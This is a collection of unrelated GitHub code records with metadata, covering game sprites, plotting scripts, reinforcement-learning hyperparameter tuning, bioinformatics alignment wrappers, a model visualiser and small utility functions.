contributor\n if len(contributors_reviews_data[reviewer][\"PRs_size\"]) > 1:\n contributor_prs_size_encoded = [\n convert_score2num(label=pr_size) for pr_size in contributors_reviews_data[reviewer][\"PRs_size\"]\n ]\n else:\n contributor_prs_size_encoded = convert_score2num(label=contributors_reviews_data[reviewer][\"PRs_size\"])\n\n contributor_pr_median_size, contributor_relative_score = convert_num2label(\n score=np.median(contributor_prs_size_encoded)\n )\n contributors_reviews_data[reviewer][\"median_pr_length\"] = contributor_pr_median_size\n 
contributors_reviews_data[reviewer][\"median_pr_length_score\"] = contributor_relative_score\n contributors_reviews_data[reviewer][\"interactions\"] = interactions[reviewer]\n\n return contributors_reviews_data\n","repo_name":"saisankargochhayat/kebechet_sample","sub_path":"srcopsmetrics/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38768959266","text":"import pygame\nimport os\nimport uuid\n\nclass Explosion(pygame.sprite.Sprite):\n\tdef __init__(self, x, y):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.uuid = str(uuid.uuid4())\n\t\tself.images = []\n\t\tfor num in range(1, 6):\n\t\t\timg = pygame.image.load(os.path.join(\"assets/explosions/\", \"exp\"+str(num)+\".png\"))\n\t\t\timg = pygame.transform.scale(img, (100, 100))\n\t\t\tself.images.append(img)\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = [x, y]\n\t\tself.counter = 0\n\n\tdef update(self):\n\t\texplosion_speed = 4\n\t\t#update explosion animation\n\t\tself.counter += 1\n\n\t\tif self.counter >= explosion_speed and self.index < len(self.images) - 1:\n\t\t\tself.counter = 0\n\t\t\tself.index += 1\n\t\t\tself.image = self.images[self.index]\n\n\t\t#if the animation is complete, reset animation index\n\t\tif self.index >= len(self.images) - 1 and self.counter >= explosion_speed:\n\t\t\tself.kill()\n\t\n\tdef to_dict(self):\n\t\treturn {\n\t\t\t\"uuid\": self.uuid,\n\t\t\t\"x\": self.rect.x,\n\t\t\t\"y\": self.rect.y\n\t\t}\n\t\n\tdef from_dict(self, data):\n\t\tself.uuid = data[\"uuid\"]\n\t\tself.rect.x = data[\"x\"]\n\t\tself.rect.y = data[\"y\"]","repo_name":"Tran-Hugo/SpaceWar","sub_path":"entities/Explosion.py","file_name":"Explosion.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38273934645","text":"import os\n\nimport figparams\nimport matplotlib.colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport studyparams\nfrom jaratoolbox import extraplots\nfrom jaratoolbox import settings\n\nFIGNAME = 'figure_characterise_behaviour'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME, FIGNAME)\n# dataDir = os.path.join(settings.FIGURES_DATA_PATH, FIGNAME)\n\nPANELS = [1, 1, 1] # Plot panel i if PANELS[i]==1\n\nSAVE_FIGURE = 1\noutputDir = '/tmp/'\nfigFilename = 'FigX_behaviour_characterisation_by_strain' # Do not include extension\nfigFormat = 'pdf' # 'pdf' or 'svg'\n# figFormat = 'svg'\nfigSize = [8,4] # In inches\n\nfontSizeLabels = figparams.fontSizeLabels\nfontSizeTicks = figparams.fontSizeTicks\nfontSizePanel = figparams.fontSizePanel\nfontSizeLegend = figparams.fontSizeLegend\n\nlabelPosX = [0.005, 0.36, 0.66, 0.42] # Horiz position for panel labels\nlabelPosY = [0.98, 0.78, 0.48, 0.28] # Vert position for panel labels\n\nfileName = 'unimplanted_behaviour.npz'\n\nwtColour = figparams.colp['excitatoryCell']\nPVColour = figparams.colp['PVcell']\nSOMColour = figparams.colp['SOMcell']\nPVCHR2Colour = figparams.colp['sound']\n\nfig = plt.gcf()\nfig.clf()\nfig.set_facecolor('w')\n\ngs = gridspec.GridSpec(2,3, width_ratios=[1, 1, 1.4])\ngs.update(top=0.94, bottom=0.10, left=0.07, right=0.98, wspace=0.3, hspace=0.5)\n\n# --- individual psychometric curve ---\nif PANELS[0]:\n dataFullPath = os.path.join(dataDir, 
fileName)\n data = np.load(dataFullPath)\n\n PVCHR2psyCurves = data['PVCHR2toneDetect']\n PVARCHTpsyCurves = data['PVARCHTtoneDetect']\n SOMARCHTpsyCurves = data['SOMARCHTtoneDetect']\n wtPsyCurves = data['wtToneDetect']\n\n possibleSNRs = data['possibleSNRs']\n\n psyCurves = [wtPsyCurves, PVCHR2psyCurves, PVARCHTpsyCurves, SOMARCHTpsyCurves]\n curveColours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n curveLabels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n for indType, curves in enumerate(psyCurves):\n axCurves = plt.subplot(gs[indType//2,indType%2])\n\n for indCurve in range(curves.shape[0]):\n plt.plot(range(len(possibleSNRs)), curves[indCurve,:], '-', color=curveColours[indType], alpha=0.3, zorder=0)\n\n plt.plot(range(len(possibleSNRs)), np.median(curves, axis=0), 'o-', color=curveColours[indType], lw=3, zorder=10)\n #plt.plot(range(len(possibleSNRs)), np.mean(curves, axis=0), 'o-', color=curveColours[indType], lw=3, zorder=10)\n\n axCurves.set_xlim(-0.2, len(possibleSNRs)-0.8)\n axCurves.set_xticks(range(len(possibleSNRs)))\n axCurves.set_xticklabels(possibleSNRs)\n if indType//2:\n axCurves.set_xlabel('SNR (dB)')\n\n axCurves.set_ylim(0, 100)\n if indType%2==0:\n axCurves.set_ylabel('% tone reported')\n\n axCurves.set_title(curveLabels[indType])\n\n extraplots.boxoff(axCurves)\n\n# -- summaries of accuracy by bandwidth --\nif PANELS[1]:\n dataFullPath = os.path.join(dataDir, fileName)\n data = np.load(dataFullPath)\n\n PVCHR2accuracy = data['PVCHR2correctByBand']\n PVARCHTaccuracy = data['PVARCHTcorrectByBand']\n SOMARCHTaccuracy = data['SOMARCHTcorrectByBand']\n wtAccuracy = data['wtCorrectByBand']\n\n possibleBands = data['possibleBands']\n bandsToUse = [0,-1] # using first and last bands because PV-ChR2 mice had a third intermediate bandwidth\n\n accuracies = [wtAccuracy, PVCHR2accuracy, PVARCHTaccuracy, SOMARCHTaccuracy]\n colours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n labels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n axScatter = plt.subplot(gs[0,2])\n\n barWidth = 0.2\n barLoc = np.array([-0.22, 0.22])\n xLocs = np.arange(4)\n xTicks = []\n xTickLabels = possibleBands[bandsToUse]\n\n for indType, accuracyData in enumerate(accuracies):\n edgeColour = matplotlib.colors.colorConverter.to_rgba(colours[indType], alpha=0.5)\n\n thisxLocs = barLoc + xLocs[indType]\n xTicks.extend(thisxLocs)\n\n for indMouse in range(accuracyData.shape[0]):\n plt.plot(thisxLocs, np.reshape(accuracyData[indMouse,bandsToUse],(2,1)), 'o-', color=colours[indType], alpha=0.3)\n\n median = np.median(accuracyData, axis=0)\n plt.plot(thisxLocs, median[bandsToUse], 'o-', color='k')\n\n # for indBand, band in enumerate(bandsToUse):\n # xvals = np.repeat(thisxLocs[indBand], accuracyData.shape[0])\n # jitterAmt = np.random.random(len(xvals))\n # xvals = xvals + (barWidth * jitterAmt) - barWidth / 2\n #\n # plt.plot(xvals, accuracyData[:,band], 'o', mec=edgeColour, mfc='none', clip_on=False, markeredgewidth=1.3)\n # median = np.median(accuracyData[:,band])\n # plt.plot([thisxLocs[indBand] - barWidth / 2, thisxLocs[indBand] + barWidth / 2], [median, median], '-', color='k', mec=edgeColour, lw=3)\n\n # ExPatch = patches.Patch(color=ExColor, label='Exc.')\n # PVPatch = patches.Patch(color=PVColor, label=r'PV$^+$')\n # SOMPatch = patches.Patch(color=SOMColor, label=r'SOM$^+$')\n # plt.legend(handles=[ExPatch, PVPatch, SOMPatch], frameon=False, fontsize=fontSizeLabels, loc='best')\n\n plt.ylim(45,100)\n plt.xlim(xTicks[0] - 0.3, xTicks[-1] + 0.3)\n plt.ylabel('Accuracy 
(%)')\n plt.xlabel('Masker bandwidth (octaves)')\n axScatter.set_xticks(xTicks)\n axScatter.set_xticklabels(np.tile(xTickLabels,len(xTicks)//2))\n extraplots.boxoff(axScatter)\n\nif PANELS[2]:\n dataFullPath = os.path.join(dataDir, fileName)\n data = np.load(dataFullPath)\n\n PVCHR2bias = data['PVCHR2biasByBand']\n PVARCHTbias = data['PVARCHTbiasByBand']\n SOMARCHTbias = data['SOMARCHTbiasByBand']\n wtBias = data['wtBiasByBand']\n\n possibleBands = data['possibleBands']\n bandsToUse = [0,-1] # using first and last bands because PV-ChR2 mice had a third intermediate bandwidth\n\n biases = [wtBias, PVCHR2bias, PVARCHTbias, SOMARCHTbias]\n colours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n labels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n axScatter = plt.subplot(gs[1,2])\n\n barWidth = 0.2\n barLoc = np.array([-0.22, 0.22])\n xLocs = np.arange(4)\n xTicks = []\n xTickLabels = possibleBands[bandsToUse]\n\n for indType, biasData in enumerate(biases):\n edgeColour = matplotlib.colors.colorConverter.to_rgba(colours[indType], alpha=0.5)\n\n thisxLocs = barLoc + xLocs[indType]\n xTicks.extend(thisxLocs)\n\n for indMouse in range(biasData.shape[0]):\n plt.plot(thisxLocs, np.reshape(biasData[indMouse,bandsToUse],(2,1)), 'o-', color=colours[indType], alpha=0.3)\n\n median = np.median(biasData, axis=0)\n plt.plot(thisxLocs, median[bandsToUse], 'o-', color='k')\n\n # ExPatch = patches.Patch(color=ExColor, label='Exc.')\n # PVPatch = patches.Patch(color=PVColor, label=r'PV$^+$')\n # SOMPatch = patches.Patch(color=SOMColor, label=r'SOM$^+$')\n # plt.legend(handles=[ExPatch, PVPatch, SOMPatch], frameon=False, fontsize=fontSizeLabels, loc='best')\n\n plt.ylim(-1,1)\n plt.xlim(xTicks[0] - 0.3, xTicks[-1] + 0.3)\n plt.ylabel('Bias')\n plt.xlabel('Masker bandwidth (octaves)')\n axScatter.set_xticks(xTicks)\n axScatter.set_xticklabels(np.tile(xTickLabels,len(xTicks)//2))\n extraplots.boxoff(axScatter)\n\nif SAVE_FIGURE:\n extraplots.save_figure(figFilename, figFormat, figSize, outputDir)\n\n#plt.show()\n","repo_name":"sjara/jaratest","sub_path":"common/2020acsigdet/extras/supplement_figure_behav_performance_by_strain.py","file_name":"supplement_figure_behav_performance_by_strain.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3480145736","text":"import os\nimport sys\nfrom functools import partial\nimport numpy as np\nimport yaml\nfrom pathlib import Path\n\nimport ray\nfrom ray import tune\nfrom ray.tune.schedulers.pb2 import PB2\n\nfrom stable_baselines3 import PPO, DDPG\nfrom stable_baselines3.common.env_util import make_vec_env\nfrom stable_baselines3.common.vec_env import VecNormalize\n\nfrom src.utils.hyperparameter_processing import preprocess_hyperparams\nfrom src.train import get_parser\nfrom src.context.sampling import sample_contexts\n\n\ndef setup_model(env, num_envs, hide_context, context_feature_args, default_sample_std_percentage, config, checkpoint_dir):\n hyperparams = {}\n env_wrapper = None\n num_contexts = 100\n contexts = sample_contexts(\n env,\n context_feature_args,\n num_contexts,\n default_sample_std_percentage=default_sample_std_percentage\n )\n env_logger = None\n from src.envs import CARLPendulumEnv, CARLBipedalWalkerEnv, CARLLunarLanderEnv\n EnvCls = partial(\n eval(env),\n contexts=contexts,\n logger=env_logger,\n hide_context=hide_context,\n )\n env = make_vec_env(EnvCls, n_envs=1, wrapper_class=env_wrapper)\n eval_env = make_vec_env(EnvCls, n_envs=1, 
wrapper_class=env_wrapper)\n\n if checkpoint_dir:\n checkpoint_dir = str(checkpoint_dir)\n checkpoint = os.path.join(checkpoint_dir, \"checkpoint\")\n model = PPO.load(checkpoint, env=env)\n else:\n model = PPO('MlpPolicy', env, **config)\n return model, eval_env\n\n\ndef eval_model(model, eval_env, config):\n eval_reward = 0\n for i in range(100):\n done = False\n state = eval_env.reset()\n while not done:\n action, _ = model.predict(state)\n state, reward, done, _ = eval_env.step(action)\n eval_reward += reward\n return eval_reward / 100\n\n\ndef train_ppo(env, num_envs, hide_context, context_feature_args, default_sample_std_percentage, config, checkpoint_dir=None):\n model, eval_env = setup_model(\n env=env,\n num_envs=num_envs,\n config=config,\n checkpoint_dir=checkpoint_dir,\n hide_context=hide_context,\n context_feature_args=context_feature_args,\n default_sample_std_percentage=default_sample_std_percentage\n )\n model.learning_rate = config[\"learning_rate\"]\n model.gamma = config[\"gamma\"]\n #model.tau = config[\"tau\"]\n model.ent_coef = config[\"ent_coef\"]\n model.vf_coef = config[\"vf_coef\"]\n model.gae_lambda = config[\"gae_lambda\"]\n model.max_grad_norm = config[\"max_grad_norm\"]\n\n for _ in range(100):\n model.learn(1e6)\n if checkpoint_dir:\n path = os.path.join(checkpoint_dir, \"checkpoint\")\n model.save(path)\n eval_reward = eval_model(model, eval_env, config)\n tune.report(\n mean_accuracy=eval_reward,\n current_config=config\n )\n\n\ndef run_experiment(args):\n parser = get_parser()\n parser.add_argument(\n \"--server-address\",\n type=str,\n default=None,\n required=False,\n help=\"The address of server to connect to if using \"\n \"Ray Client.\")\n parser.add_argument(\n \"--checkpoint_dir\", type=str, default=\"results/experiments/pb2\"\n )\n parser.add_argument(\"--name\", type=str, help=\"Experiment name\")\n parser.add_argument(\"--outdir\", type=str, help=\"Result directory\")\n parser.add_argument(\"--env\", type=str, help=\"Environment to optimize for\")\n parser.add_argument(\"--hide_context\", action=\"store_true\")\n parser.add_argument(\"--default_sample_std_percentage\", type=float, default=0.1)\n parser.add_argument(\"--context_feature\", type=str, help=\"Context feature to adapt\")\n\n args, unknown_args = parser.parse_known_args()\n local_dir = os.path.join(args.outdir, \"ray\")\n args.default_sample_std_percentage = 0.1\n args.context_feature_args = [args.context_feature]\n checkpoint_dir = args.checkpoint_dir\n\n # checkpoint_dir = Path(checkpoint_dir)\n # checkpoint_dir.mkdir(parents=True, exist_ok=True)\n # args.num_envs = 1\n if args.server_address:\n ray.util.connect(args.server_address)\n else:\n ray.init()\n\n print(\"current workdir:\", os.getcwd())\n\n pbt = PB2(\n perturbation_interval=1,\n hyperparam_bounds={\n 'learning_rate': [0.00001, 0.02],\n 'gamma': [0.8, 0.999],\n 'gae_lambda': [0.8, 0.999],\n 'ent_coef': [0.0, 0.5],\n 'max_grad_norm': [0.0, 1.0],\n 'vf_coef': [0.0, 1.0],\n #'tau': [0.0, 0.99]\n },\n log_config=True,\n require_attrs=True,\n )\n\n defaults = {\n 'batch_size': 128, # 1024,\n 'learning_rate': 3e-5,\n 'gamma': 0.99, # 0.95,\n }\n\n analysis = tune.run(\n partial(\n train_ppo,\n args.env,\n args.num_envs,\n args.hide_context,\n args.context_feature_args,\n args.default_sample_std_percentage\n ),\n name=args.name,\n scheduler=pbt,\n metric=\"mean_accuracy\",\n mode=\"max\",\n verbose=3,\n stop={\n \"training_iteration\": 250,\n # \"timesteps_total\": 1e6,\n },\n num_samples=8,\n fail_fast=True,\n # Search defaults 
from zoo overwritten with brax demo\n config=defaults,\n local_dir=local_dir,\n log_to_file=True,\n )\n\n all_dfs = analysis.trial_dataframes\n for i, (name, df) in enumerate(all_dfs.items()):\n fname = Path(os.path.join(args.outdir, f\"trail_df_{i}_{name.strip('_')}.csv\"))\n fname.parent.mkdir(parents=True, exist_ok=True)\n df.to_csv(fname)\n print(\"Best hyperparameters found were: \", analysis.best_config)\n ray.shutdown()\n\nif __name__ == '__main__':\n run_experiment(sys.argv[1:])\n","repo_name":"automl-private/cRL_HPO","sub_path":"cRL_HPO/run_pb2.py","file_name":"run_pb2.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41477404486","text":"from aitools.StateMachine import *\r\nimport GameEntity\r\nfrom gametools.vector2 import Vector2\r\nimport glob\r\n\r\nimport ImageFuncs\r\nimport pygame\r\n\r\n\r\nclass Building(GameEntity.GameEntity):\r\n def __init(self, world, name, image_string=\"Inn\"):\r\n GameEntity.__init__(self, world, name, \"Buildings/\"+image_string)\r\n\r\n self.image_funcs = ImageFuncs(32, 32, pygame.image.load(\"Images/Buildings/TotalImage.png\"))\r\n self.tile_x, self.tile_y = pos\r\n self.cost = 100\r\n get_images(name)\r\n \r\n self.can_drop_food = False\r\n self.can_drop_wood = False\r\n\r\n\r\nclass LumberYard(Building):\r\n def __init__(self, world, image_string=\"LumberYard\"):\r\n Building.__init__(self, world, \"Lumber Yard\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 2)\r\n self.Held = 0\r\n self.HeldMax = 50\r\n self.cost = 100\r\n\r\n self.world.MAXwood += self.HeldMax\r\n self.can_drop_wood = True\r\n\r\n\r\nclass Dock(Building):\r\n \r\n def __init__(self, world, image_string=\"Dock\"):\r\n Building.__init__(self, world, \"Dock\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 0)\r\n\r\n self.Held = 0\r\n self.HeldMax = 25\r\n self.cost = 150\r\n \r\n self.can_drop_food = True\r\n\r\n self.world.MAXfood += self.HeldMax\r\n \r\nclass House(Building):\r\n def __init__(self, world, image_string=\"House\"):\r\n Building.__init__(self, world, \"House\", image_string)\r\n\r\n self.supports = 5\r\n self.cost = 30\r\n\r\n self.world.MAXpopulation += self.supports\r\n\r\n\r\nclass Manor(Building):\r\n def __init__(self, world, image_string=\"Manor\"):\r\n Building.__init__(self, world, \"Manor\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 4)\r\n\r\n self.supports = 15\r\n self.cost = 100\r\n\r\n self.world.MAXpopulation += self.supports\r\n \r\nclass TownCenter(Building):\r\n def __init__(self, world, image_string=\"Manor\"):\r\n Building.__init__(self, world, \"Town Center\", image_string)\r\n \r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 6)\r\n\r\n self.can_drop_food = True\r\n self.can_drop_wood = True\r\n \r\n self.supports = 15\r\n self.cost = 500\r\n \r\n self.world.MAXpopulation += self.supports\r\n self.world.MAXWood += 50\r\n self.world.MAXFood += 50\r\n\r\n\r\nclass UnderConstruction(Building):\r\n def __init__(self, world, image_string, will_be):\r\n Building.__init__(self, world, \"Under Construction\", image_string)\r\n self.will_be = will_be\r\n self.ttb = 30.0\r\n self.max_ttb = 30.0\r\n\r\n def create(self):\r\n self.world.add_built(self.will_be, self.location)\r\n self.world.remove_entity(self)\r\n\r\n\r\nclass StoreShed(Building):\r\n\r\n def __init__(self, world, image_string):\r\n Building.__init__(self, 
world, \"Store Shed\", image_string)\r\n","repo_name":"najarvis/villager-sim","sub_path":"Buildings.py","file_name":"Buildings.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"4082256506","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import RadioButtons\nfrom matplotlib.widgets import Slider\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nclass VisualizeMetamodel:\n \"\"\"\n Class that contains functions to visualize a metamodel. At least the metamodel as well as the boundaries of the\n visualization have to be parametrizes in its designated setter functions. By executing the plot_metamodel function,\n an matplotlib plot is generated, where the plane of observation can be selected by setting radio buttons and\n sliders.\n \"\"\"\n def __init__(self):\n self._metamodel = None\n self._bounds = None\n self._points_per_axis = 100\n self._current_values = []\n self._x_axis_num = 0\n self._y_axis_num = 1\n self._c_levels = 100\n self._eq_lines = 10\n self._num_doe_points = None\n\n @property\n def metamodel(self):\n return self._metamodel\n\n @metamodel.setter\n def metamodel(self, model):\n self._metamodel = model\n\n @property\n def bounds(self):\n return self._bounds\n\n @bounds.setter\n def bounds(self, array):\n self._bounds = array\n\n @property\n def points_per_axis(self):\n return self._points_per_axis\n\n @points_per_axis.setter\n def points_per_axis(self, number):\n self._points_per_axis = number\n\n @property\n def current_values(self):\n return self._current_values\n\n @current_values.setter\n def current_values(self, values):\n self._current_values = values\n\n @property\n def x_axis_num(self):\n return self._x_axis_num\n\n @x_axis_num.setter\n def x_axis_num(self, number):\n self._x_axis_num = number\n\n @property\n def y_axis_num(self):\n return self._y_axis_num\n\n @y_axis_num.setter\n def y_axis_num(self, number):\n self._y_axis_num = number\n\n @property\n def c_levels(self):\n return self._c_levels\n\n @c_levels.setter\n def c_levels(self, number):\n self._c_levels = number\n\n @property\n def eq_lines(self):\n return self._eq_lines\n\n @eq_lines.setter\n def eq_lines(self, number):\n self._eq_lines = number\n\n @property\n def num_doe_points(self):\n return self._num_doe_points\n\n @num_doe_points.setter\n def num_doe_points(self, number):\n self._num_doe_points = number\n\n def plot_metamodel(self):\n \"\"\"\n Creates a plot showing one plane of the metamodel. The plane can be changed by selecting radio buttons. The\n other parameters are constant and can be set via sliders on the plot. 
\n \"\"\"\n fig, ax = plt.subplots()\n\n plt.subplots_adjust(left=0.15)\n plt.subplots_adjust(bottom=0.1 + 0.05 * self.bounds.shape[0])\n\n cax = make_axes_locatable(ax).append_axes(\"right\", size=\"5%\", pad=\"2%\")\n\n linspaces = []\n for bound in self.bounds:\n linspaces.append(np.linspace(bound[0], bound[1], self.points_per_axis))\n self.current_values.append(np.average(bound))\n\n def replot():\n plot_points = [None] * self.bounds.shape[0]\n for i, bound in enumerate(self.bounds):\n if i == min(self.x_axis_num, self.y_axis_num):\n x_coords, y_coords = np.meshgrid(linspaces[self.x_axis_num], linspaces[self.y_axis_num])\n\n plot_points[self.x_axis_num] = x_coords.reshape(-1)\n plot_points[self.y_axis_num] = y_coords.reshape(-1)\n\n elif i == max(self.x_axis_num, self.y_axis_num):\n continue\n\n else:\n plot_points[i] = self.current_values[i] * np.ones(\n [self.points_per_axis, self.points_per_axis]).reshape(-1)\n\n plot_points = np.array(plot_points).T\n\n sm_result = self.metamodel.predict_values(plot_points)\n\n ax.clear()\n\n im = ax.contourf(plot_points[:, self.x_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n plot_points[:, self.y_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n sm_result.reshape(self.points_per_axis, self.points_per_axis), self.c_levels)\n\n ax.contour(plot_points[:, self.x_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n plot_points[:, self.y_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n sm_result.reshape(self.points_per_axis, self.points_per_axis), self.eq_lines, colors=\"black\")\n\n images = []\n\n if False:\n images.append(ax.plot(self.metamodel.training_points[None][0][0][self.num_doe_points:][:,self.x_axis_num],\n self.metamodel.training_points[None][0][0][self.num_doe_points:][:,self.y_axis_num], \"rx\"))\n\n images.append(ax.plot(self.metamodel.training_points[None][0][0][:self.num_doe_points][:,self.x_axis_num],\n self.metamodel.training_points[None][0][0][:self.num_doe_points][:,self.y_axis_num], \"bx\"))\n\n y_opt = min(self.metamodel.training_points[None][0][1])\n x_opt = self.metamodel.training_points[None][0][0][self.metamodel.training_points[None][0][1].tolist().index(y_opt)]\n\n images.append(ax.plot(x_opt[self.x_axis_num], x_opt[self.y_axis_num], \"gx\"))\n\n\n #images.append(ax.plot(self.))\n\n # images.append(ax.grid())\n\n cax.clear()\n\n fig.colorbar(im, cax=cax)\n\n plt.show()\n\n def update(val):\n current_values = []\n for slider in sliders:\n current_values.append(slider.val)\n\n self.current_values = current_values\n\n replot()\n\n sliders = []\n for i, bound in enumerate(self.bounds):\n sliders.append(\n Slider(\n ax=plt.axes([0.25, 0.05 + 0.05 * i, 0.65, 0.03]),\n label=\"parameter_\" + str(i),\n valmin=bound[0],\n valmax=bound[1],\n valinit=np.average(bound)\n )\n )\n sliders[-1].on_changed(update)\n\n axis_numbers = list(range(0, self.bounds.shape[0]))\n axis_numbers_str = [\"parameter_\" + str(i) for i in axis_numbers]\n axis_dict = dict(zip(axis_numbers_str, axis_numbers))\n\n rax = plt.axes([0.05, 0.7, 0.075, 0.15])\n x_radio = RadioButtons(rax, tuple(axis_numbers_str))\n\n def x_axis(label):\n self.x_axis_num = axis_dict[label]\n replot()\n\n x_radio.on_clicked(x_axis)\n\n rax = plt.axes([0.05, 0.4, 0.075, 0.15])\n y_radio = RadioButtons(rax, tuple(axis_numbers_str))\n\n def y_axis(label):\n self.y_axis_num = axis_dict[label]\n replot()\n\n y_radio.on_clicked(y_axis)\n y_radio.set_active(self.y_axis_num)\n\n plt.show()\n\nif __name__ == \"__main__\":\n import 
smt.sampling_methods as sampling\n import smt.surrogate_models as smt\n\n def get_sm(fun, bounds, doe_num):\n doe = sampling.LHS(xlimits=bounds)\n x_0 = doe(doe_num)\n y_0 = fun(*tuple([x_0[:, i] for i in range(bounds.shape[0])]))\n\n sm = smt.RBF(d0=5)\n sm.set_training_values(x_0, y_0)\n sm.train()\n\n return (sm)\n\n\n def fun(x, y, z, a):\n return x ** 2 + y ** 2 + (x * z) ** 2 + y+ z + np.sin(a)\n\n\n bounds = np.array([[-1, 1], [0, 2], [2, 6], [0,50]])\n sm = get_sm(fun, bounds, 50)\n\n vis = VisualizeMetamodel()\n vis.bounds = bounds\n vis.metamodel = sm\n vis.num_doe_points = 25\n vis.points_per_axis = 100\n\n vis.plot_metamodel()\n","repo_name":"hbrs-cse/treeopt","sub_path":"treeopt/visualize2.py","file_name":"visualize2.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24788163017","text":"#! /usr/bin/env python3\n\n#Michiel Merx and Inne Lemstra 2017-01-24\n#Not working still under construction\nimport subprocess\nimport time\n\ndef benchmark(outputPreStep, shortReads):\n\toutput = \"../test_data/Soap2_alignment_paired.sam\"\n\t\n\tstartTime = time.time()\n\tdebug = go(outputPreStep, shortReads, output)\n\tendTime = time.time()\n\t\n\tbmAlign = endTime - startTime\n\treturn([bmAlign, debug])\n\ndef go(indexOutputPath, shortReadspath, alignOutputPath):\n\tcomAlign = \"soap -a {1} {2} -D {0} -o {3}\"\\\n\t\t.format(indexOutputPath, shortReadspath[0],\\\n\t\t\t shortReadspath[1], alignOutputPath)\n\tdebug = subprocess.call([\"/bin/bash\", \"-i\", \"-c\", comAlign])\n\treturn(debug)\n\nif __name__ == \"main\":\n\tindexOutputPath = \"./index_files/index_ecoli\"\n\tshortReadpath = \"./sra_set.fasta\"\n\talginOutputPath = \"./alignments/ecoli\"\n\tdebug = go(indexOutputPath, shortReadpath, alginOutputPath)\n","repo_name":"MWJMerkx/pcfb_project","sub_path":"client/sra_modules/soap2Align.py","file_name":"soap2Align.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20614991131","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport shutil\nimport tempfile\n\nimport keras\nimport pytest\n\nSPEC_FILES = [\n 'default_spec.txt',\n]\n\n\n@pytest.mark.script_launch_mode('subprocess')\n@pytest.mark.slow\n@pytest.mark.parametrize('_spec_file', SPEC_FILES)\ndef test_train(script_runner, tmpdir, _spec_file):\n '''Test the train script.'''\n keras.backend.clear_session()\n keras.backend.set_learning_phase(1)\n script = 'nvidia_tao_tf1/cv/retinanet/scripts/train.py'\n env = os.environ.copy()\n parent_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n spec_file = os.path.join(parent_dir, 'experiment_specs', _spec_file)\n temp_dir_name = tempfile.mkdtemp()\n\n args = ['-e']\n args.append(spec_file)\n args.append('-k')\n args.append('nvidia_tlt')\n args.append('-r')\n args.append(temp_dir_name)\n ret = script_runner.run(script, env=env, *args)\n try:\n assert ret.success\n shutil.rmtree(temp_dir_name)\n except AssertionError:\n print(\"Local path is not ready.\")\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/retinanet/scripts/tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"43426336495","text":"def 
subset(s, n, arr=[]):\n def sub(s, n, arr=[]):\n if n:\n return sub(s[:n-1] + s[n:], n-1, arr + [s])\n else: return arr\n if n:\n return subset([s[-1]] + s[:-1], n-1, arr + sub(s, len(s)))\n else: return arr\n\n\ndef subset2(nums):\n if not nums: return [[]]\n out = []\n \n def sub(nums, p):\n if nums:\n sub(nums[1:], p + [nums[0]])\n sub(nums[1:], p)\n else: out.append(p)\n sub(nums, [])\n return out\n\ndef subset3(arr):\n n = len(arr)\n if n == 0:\n return []\n if n == 1:\n return [arr]\n\n subs = []\n\n for i in range(n):\n m = arr[i]\n subs.append([m])\n remainder = arr[i+1:]\n for sub in subset3(remainder):\n subs.append([m] + sub)\n return subs\n\nprint(subset([1,2,3], 3))\nprint(subset2([1,2,3]))\nprint(subset3([1,2,3]))\n","repo_name":"ethan-haynes/coding-problems","sub_path":"python/src/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10449688262","text":"import pyqrcode \nimport png \nfrom pyqrcode import QRCode \n\n# open file\nfile = open('qrData','r')\narr = file.readlines()\n\nfor id,item in enumerate(arr):\n # delete \\n\n s = item[:-1]\n \n name = 'qr/myqr'+str(id+1)+'.png'\n 